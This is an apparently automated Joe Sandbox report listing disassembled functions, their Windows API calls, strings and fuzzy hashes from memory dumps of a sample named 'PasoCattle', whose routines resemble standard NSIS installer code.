Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

..., xrefs: 004062BF
%02x%c, xrefs: 0040629C

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

